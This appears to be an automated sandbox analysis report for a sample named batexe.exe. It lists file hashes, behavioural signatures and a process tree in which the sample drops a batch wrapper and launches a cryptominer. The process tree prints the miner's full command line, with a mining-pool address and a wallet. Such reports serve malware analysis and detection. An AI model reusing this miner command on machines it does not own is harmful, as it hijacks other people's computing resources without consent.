Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
293s -
max time network
300s -
platform
windows10-1703_x64 -
resource
win10-20240214-ja -
resource tags
arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows -
submitted
18/02/2024, 02:21
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240214-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 1636 b2e.exe 2564 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 2564 cpuminer-sse2.exe 2564 cpuminer-sse2.exe 2564 cpuminer-sse2.exe 2564 cpuminer-sse2.exe 2564 cpuminer-sse2.exe -
resource yara_rule behavioral1/memory/2228-5-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2228 wrote to memory of 1636 2228 batexe.exe 75 PID 2228 wrote to memory of 1636 2228 batexe.exe 75 PID 2228 wrote to memory of 1636 2228 batexe.exe 75 PID 1636 wrote to memory of 648 1636 b2e.exe 76 PID 1636 wrote to memory of 648 1636 b2e.exe 76 PID 1636 wrote to memory of 648 1636 b2e.exe 76 PID 648 wrote to memory of 2564 648 cmd.exe 79 PID 648 wrote to memory of 2564 648 cmd.exe 79
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2228 -
C:\Users\Admin\AppData\Local\Temp\8D5B.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\8D5B.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\8D5B.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1636 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8F5F.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:648 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2564
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4.2MB
MD5a9fa1a3698f8783ba4b99e08096b654e
SHA142fd65fe46dee88805baf3b9b2ccfbb5cdbdc095
SHA25677d5fc430b5ad47e745a2debf92019dd98714355e6a22ff740b946d8ee5348cc
SHA512bd3ca56db429f4d8d1b08cb6f1acf339bcd9dcdd9a6d70a3473ee48da4e12866d48a33b73aeaf380c453bfdf982c2a3e8749091a8e7485a05f6f3f22b4a52a45
-
Filesize
3.7MB
MD51c81a133b3db125a8670076deb8a0dc8
SHA16c97e88d48753d95245ad0efcb346d0683d8c3ee
SHA256067303d49e2d27fbec74aba78782bfa3cc86bb470c331b0cfaa18053749e1796
SHA5126e8151b1fc3cba6e93737aa1fc7b7d4f5b6bef234db92bb6c36f54293429dcd72885f3635210860361765d47f1e45a1b2c54e612c68c39cecdc53e7f40d3434e
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
1.9MB
MD5d99c798c7f6cfe43995a514ef7f018b6
SHA102863f4de70e13f944aea63ad28afc11a092ce6c
SHA2569641b85bdd0fb76c8f0a39622af56407f85c950eea746e0e74be2ca6291d48a7
SHA512a2f262fda951109923ada8c66fb91e21ef9c2e891f4de677a20e8195add7f27efba23511c9d5801d75f83a9b3858aec5bcc14df243e958d91d05a1792bce5a9e
-
Filesize
2.2MB
MD5f50b70e9913dbf9d1c51ae4e8b705b07
SHA14a60619b863339a73ce2c7c8303153c7e2ab4b19
SHA2568c1804d1c0e1a21884041a3f9dfb20a2a0744d5f30c6fa2a5ba28cac1ff27c35
SHA51263888fcf284e1ca14fa55dc2fc5daae5fa415ad196bf44aca15ca989735d199ae31b7a21b5e6cdcb9d552c21beafb3f2c7a35adc06ea9f640edfb922495ede37
-
Filesize
2.2MB
MD5ee5b48f7860bbcd9b855d36e657cc804
SHA1b44428677b43f7c914730c8b10ffecd72da1c78c
SHA2569bb0410abf49d3223e9b81e9149a3c7bb567f366fe43be91752be0e90edb59ae
SHA512c1997a0d13ccd83083f1ef118f68d6d95e863fc3a258b823445188ce12190f8016a794a2821813f5a18aab6858ee8fbdea39a32b6886707d5761a91a78531b49
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
1.2MB
MD57cf672bee2afba2dcd0c031ff985958e
SHA16b82a205db080ffdcb4a4470fce85a14413f3217
SHA256c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05
SHA5123e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5
-
Filesize
3.0MB
MD51bc75742cbd1495681ba45240af90b94
SHA1edf5e8b6d3a88a3d7bafa8e3b08ed21b85992f9e
SHA25670971e746ed0a759354fb513bac6f26e11e78967703b0b328dc7e2e6693d8698
SHA512c1e9d7cc249874fe81971347285a601dac09d9b0acf116fa76751256e96cb7b0d1ff6c76bdc5dd004aee0f6af9ead4692e7910a7b3e55a2d7812d2f441d12b92
-
Filesize
2.5MB
MD533060886a4b3b6cfdffbae7cec8219a5
SHA14782fe57f8850e0a1e91c628899763b82ed98c68
SHA25674f19d1feca3ecb7e59ee0fcbeb346878c6e390968477c27679821c3cadad1b3
SHA512424fa53ca415d9b37f03636ea585e39176631c7141be48de13f94042cdd997e0ce26953d186931a5989c667bcfb8e58f6379b2bb6a9a6c08e89948340cc8498d
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770